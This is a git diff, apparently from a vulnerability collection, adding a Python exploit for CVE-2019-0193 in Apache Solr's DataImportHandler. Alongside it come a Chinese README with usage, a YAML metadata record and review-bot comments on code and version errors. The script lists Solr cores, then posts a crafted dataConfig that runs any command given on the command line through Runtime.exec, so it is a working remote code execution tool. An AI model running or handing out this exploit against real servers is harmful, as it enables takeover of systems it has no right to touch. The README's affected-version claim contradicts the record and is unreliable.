diff --git a/cve/apache-solr/2019/CVE-2019-0193/CVE-2019-0193.py b/cve/apache-solr/2019/CVE-2019-0193/CVE-2019-0193.py
new file mode 100644
index 0000000000000000000000000000000000000000..bf16b9feb546fd306ad22dfe6a47d7bfee252920
--- /dev/null
+++ b/cve/apache-solr/2019/CVE-2019-0193/CVE-2019-0193.py
@@ -0,0 +1,91 @@
+import requests
+import json
+import sys
+
+
+banner = '''
+ _______ ________ ___ ___ __ ___ ___ __ ___ ____
+ / ____\ \ / / ____| |__ \ / _ \/_ |/ _ \ / _ \/_ |/ _ \___ \
+ | | \ \ / /| |__ ______ ) | | | || | (_) |______| | | || | (_) |__) |
+ | | \ \/ / | __|______/ /| | | || |\__, |______| | | || |\__, |__ <
+ | |____ \ / | |____ / /_| |_| || | / / | |_| || | / /___) |
+ \_____| \/ |______| |____|\___/ |_| /_/ \___/ |_| /_/|____/
+
+ python By jas502n
+'''
+print banner
+
+def admin_cores(url, cmd):
+ core_selector_url = url + '/solr/admin/cores?_=1565526689592&indexInfo=false&wt=json'
+ r = requests.get(url=core_selector_url)
+ json_strs = json.loads(r.text)
+ if r.status_code ==200 and "responseHeader" in r.text:
+ print "\nHere Have %s Core_name Exit!\n" % str(len(json_strs['status']))
+ for core_selector in json_strs['status']:
+ jas502n_Core_Name = json_strs['status']['%s'%core_selector]['name']
+ print '\n>>>>The Core Name = %s' % jas502n_Core_Name
+ show_config(url,jas502n_Core_Name)
+ get_config_name(url,jas502n_Core_Name)
+ URLDataSource_Poc(url,jas502n_Core_Name,cmd)
+
+ else:
+ print "No core_selector Exit!"
+
+
+
+
+def show_config(url,jas502n_Core_Name):
+ config_url = url + "/solr/"+ jas502n_Core_Name +"/dataimport?_=1565530241159&command=show-config&indent=on&wt=json"
+ r1 = requests.get(config_url)
+
+ if r1.status_code ==200 and 'dataConfig' in r1.text:
+ print ">> config_url= %s"% config_url
+ print ">%s dataConfig Exit!" % jas502n_Core_Name
+ else:
+ print "dataConfig No Exit!"
+
+
+
+def get_config_name(url,jas502n_Core_Name):
+ get_config_url = url + '/solr/'+ jas502n_Core_Name +'/dataimport?_=1565530241159&command=status&indent=on&wt=json'
+ r2 = requests.get(get_config_url)
+ if r2.status_code ==200 and 'config' in r2.text:
+ print ">> get_config_url= %s" % get_config_url
+ r2_json = json.loads(r2.text)
+ r2_str = r2_json['initArgs']
+
+ print '>get_config_name= %s' % r2_str[1][1]
+
+ else:
+ print "Core Config Name No Exit!"
+
+
+
+def URLDataSource_Poc(url,jas502n_Core_Name,cmd):
+ debug_model_url = url + '/solr/'+ jas502n_Core_Name +'/dataimport?_=1565530241159&indent=on&wt=json'
+ payload = "command=full-import&verbose=false&clean=true&commit=true&debug=true&core=atom&dataConfig=%%3CdataConfig%%3E%%0A++%%3CdataSource+type%%3D%%22URLDataSource%%22%%2F%%3E%%0A++%%3Cscript%%3E%%3C!%%5BCDATA%%5B%%0A++++++++++function+poc()%%7B+java.lang.Runtime.getRuntime().exec(%%22%s%%22)%%3B%%0A++++++++++%%7D%%0A++%%5D%%5D%%3E%%3C%%2Fscript%%3E%%0A++%%3Cdocument%%3E%%0A++++%%3Centity+name%%3D%%22stackoverflow%%22%%0A++++++++++++url%%3D%%22https%%3A%%2F%%2Fstackoverflow.com%%2Ffeeds%%2Ftag%%2Fsolr%%22%%0A++++++++++++processor%%3D%%22XPathEntityProcessor%%22%%0A++++++++++++forEach%%3D%%22%%2Ffeed%%22%%0A++++++++++++transformer%%3D%%22script%%3Apoc%%22+%%2F%%3E%%0A++%%3C%%2Fdocument%%3E%%0A%%3C%%2FdataConfig%%3E&name=dataimport" % cmd
+ headers = {
+ "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
+ "Accept": "application/json, text/plain, */*",
+ "Accept-Language":"zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
+ "Accept-Encoding":"gzip, deflate",
+ "Content-type":"application/x-www-form-urlencoded",
+ "X-Requested-With":"XMLHttpRequest",
+ "Referer":"http://%s/solr/" % url
+
+ }
+ r3 = requests.post(url = debug_model_url, data=payload,headers=headers)
+ print ">>>>> debug_model_url= %s" % debug_model_url
+ if r3.status_code ==200 and 'Requests' in r3.text:
+
+ print "Send Poc Success!"
+ else:
+ print "No Send Poc Success!"
+ print r3.text
+
+
+
+if __name__ == '__main__':
+ cmd = sys.argv[2]
+ url = sys.argv[1]
+ admin_cores(url,cmd)
\ No newline at end of file
diff --git a/cve/apache-solr/2019/CVE-2019-0193/README.md b/cve/apache-solr/2019/CVE-2019-0193/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..a19fa0a1ac94ab8a12c5b40c2811c3dd802643ca
--- /dev/null
+++ b/cve/apache-solr/2019/CVE-2019-0193/README.md
@@ -0,0 +1,9 @@
+# CVE-2019-0193 Solr DataImport Handler RCE (RCE-Vuln < solr v8.12)
+
+## 描述
+
+Apache Solr是美国阿帕奇(Apache)软件基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器。该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。Apache Solr的DataImportHandler是一个可选但常用的模块,可从数据库(通过JDBC)、RSS、Web 页面和文件中导入数据。而且这个模块的配置文件不仅可以在服务端中通过配置文件指定,也可以从用户请求的dataConfig中获取。
+
+## 用法
+
+```python CVE-2019-0193.py http://192.168.2.18:8983 "calc"```
\ No newline at end of file
diff --git a/cve/apache-solr/2019/yaml/CVE-2019-0193.yaml b/cve/apache-solr/2019/yaml/CVE-2019-0193.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..fd16aeb2017bd13817e20c9490e8e965363d9cb3
--- /dev/null
+++ b/cve/apache-solr/2019/yaml/CVE-2019-0193.yaml
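Review bot: The script is Python 2 only — `print banner` (line 16) and every other print statement are invalid Python 3 syntax — yet the README added in this commit runs it as `python CVE-2019-0193.py ...`, which on a current system fails with a SyntaxError before anything executes; the file also has no module docstring stating the interpreter it targets or its `requests` dependency. In admin_cores, `json_strs = json.loads(r.text)` runs before the `r.status_code ==200 and "responseHeader" in r.text` check, so any non-JSON body (error page, redirect to a login form) raises an unhandled ValueError instead of reaching the `No core_selector Exit!` branch; the parse belongs inside the `if`. The `__main__` block indexes `sys.argv[2]` and `sys.argv[1]` unguarded, giving an IndexError rather than a usage message; `if len(sys.argv) != 3: sys.exit("usage: CVE-2019-0193.py <url> <cmd>")` before the assignments would document the interface.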
@@ -0,0 +1,39 @@
+id: CVE-2019-0193
+source:- https://github.com/jas502n/CVE-2019-0193
+info:
+ name: Apache Solr是美国阿帕奇(Apache)基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器。该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。
+ severity: high
+ description:
+ 在Apache Solr中,DataImportHandler是一个可选但常用的模块,用于从数据库和其他源中提取数据,它具有一个功能,其中整个DIH配置可以来自请求的“dataConfig”参数。 DIH管理界面的调试模式使用它来方便调试/开发DIH配置。由于DIH配置可以包含脚本,因此该参数存在安全风险。从Solr的8.2.0版开始,使用此参数需要将Java System属性“enable.dih.dataConfigParam”设置为true。
+ scope-of-influence:
+ Apache Solr < 8.2.0
+ reference:
+ - https://issues.apache.org/jira/browse/SOLR-13669
+ - https://lists.apache.org/thread.html/1addbb49a1fc0947fb32ca663d76d93cfaade35a4848a76d4b4ded9c@%3Cissues.lucene.apache.org%3E
+ - https://lists.apache.org/thread.html/42cc4d334ba33905b872a0aa00d6a481391951c8b1450f01b077ce74@%3Cissues.lucene.apache.org%3E
+ - https://lists.apache.org/thread.html/55880d48e38ba9e8c41a3b9e41051dbfdef63b86b0cfeb32967edf03@%3Cissues.lucene.apache.org%3E
+ - https://lists.apache.org/thread.html/6f2d61bd8732224c5fd3bdd84798f8e01e4542d3ee2f527a52a81b83@%3Cissues.lucene.apache.org%3E
+ - https://lists.apache.org/thread.html/7143983363f0ba463475be4a8b775077070a08dbf075449b7beb51ee@%3Cissues.lucene.apache.org%3E
+ - https://lists.apache.org/thread.html/9b0e7a7e3e18d0724f511403b364fc082ff56e3134d84cfece1c82fc@%3Cissues.lucene.apache.org%3E
+ - https://lists.apache.org/thread.html/a6e3c09dba52b86d3a1273f82425973e1b0623c415d0e4f121d89eab@%3Cissues.lucene.apache.org%3E
+ - https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3@%3Ccommits.nifi.apache.org%3E
+ - https://lists.apache.org/thread.html/e85f735fad06a0fb46e74b7e6e9ce7ded20b59637cd9f993310f814d@%3Cissues.lucene.apache.org%3E
+ - https://lists.apache.org/thread.html/r140128dc6bb4f4e0b6a39e962c7ca25a8cbc8e48ed766176c931fccc@%3Cusers.solr.apache.org%3E
+ - https://lists.apache.org/thread.html/r19d23e8640236a3058b4d6c23e5cd663fde182255f5a9d63e0606a66@%3Cdev.lucene.apache.org%3E
+ - https://lists.apache.org/thread.html/r1d4a247329a8478073163567bbc8c8cb6b49c6bfc2bf58153a857af1@%3Ccommits.druid.apache.org%3E
+ - https://lists.apache.org/thread.html/r339865b276614661770c909be1dd7e862232e3ef0af98bfd85686b51@%3Cdev.lucene.apache.org%3E
+ - https://lists.apache.org/thread.html/r33aed7ad4ee9833c4190a44e2b106efd2deb19504b85e012175540f6@%3Cissues.lucene.apache.org%3E
+ - https://lists.apache.org/thread.html/r3da74965aba2b5f5744b7289ad447306eeb2940c872801819faa9314@%3Cusers.solr.apache.org%3E
+ - https://lists.apache.org/thread.html/r95df34bb158375948da82b4dfe9a1b5d528572d586584162f8f5aeef@%3Cusers.solr.apache.org%3E
+ - https://lists.apache.org/thread.html/rb34d820c21f1708c351f9035d6bc7daf80bfb6ef99b34f7af1d2f699@%3Cissues.lucene.apache.org%3E
+ - https://lists.apache.org/thread.html/rc400db37710ee79378b6c52de3640493ff538c2beb41cefdbbdf2ab8@%3Ccommits.submarine.apache.org%3E
+ - https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b@%3Ccommits.nifi.apache.org%3E
+ - https://lists.debian.org/debian-lts-announce/2019/10/msg00013.html
+ - https://lists.debian.org/debian-lts-announce/2020/08/msg00025.html
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 7.2
+ cve-id: CVE-2019-0193
+ cnvd-id: None
+ kve-id: None
+ tags: 对生成代码的控制不恰当,代码注入
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index cae1e168f77fb28a2363540f49132effef2a42d6..325bf7a91d76d131070e60f45c7fa60deda790f6 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -16,6 +16,7 @@ cve:
 - CVE-2021-44228
 apache-solr:
 - CVE-2021-27905
+ - CVE-2019-0193
 apache-tomcat:
 - CVE-2022-29885
 - CVE-2020-9484
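Review bot: `source:- https://github.com/jas502n/CVE-2019-0193` on the second line of the new yaml is not valid YAML as rendered here — the key and its list item are fused on one line, so the record will not parse at all; it should be `source:` on its own line followed by an indented `- https://github.com/jas502n/CVE-2019-0193` item (unless a line break was lost in rendering, in which case ignore this). `info.name` holds the product description rather than a vulnerability name; the title used in the README of this commit, `CVE-2019-0193 Solr DataImport Handler RCE`, is what a consumer of this record expects in that field, and the product blurb can move into `description`. That README title also states `< solr v8.12`, which contradicts `scope-of-influence: Apache Solr < 8.2.0` here and the description's own statement that the `enable.dih.dataConfigParam` gate was introduced in 8.2.0; 8.2.0 is the consistent value and the README should be aligned to it.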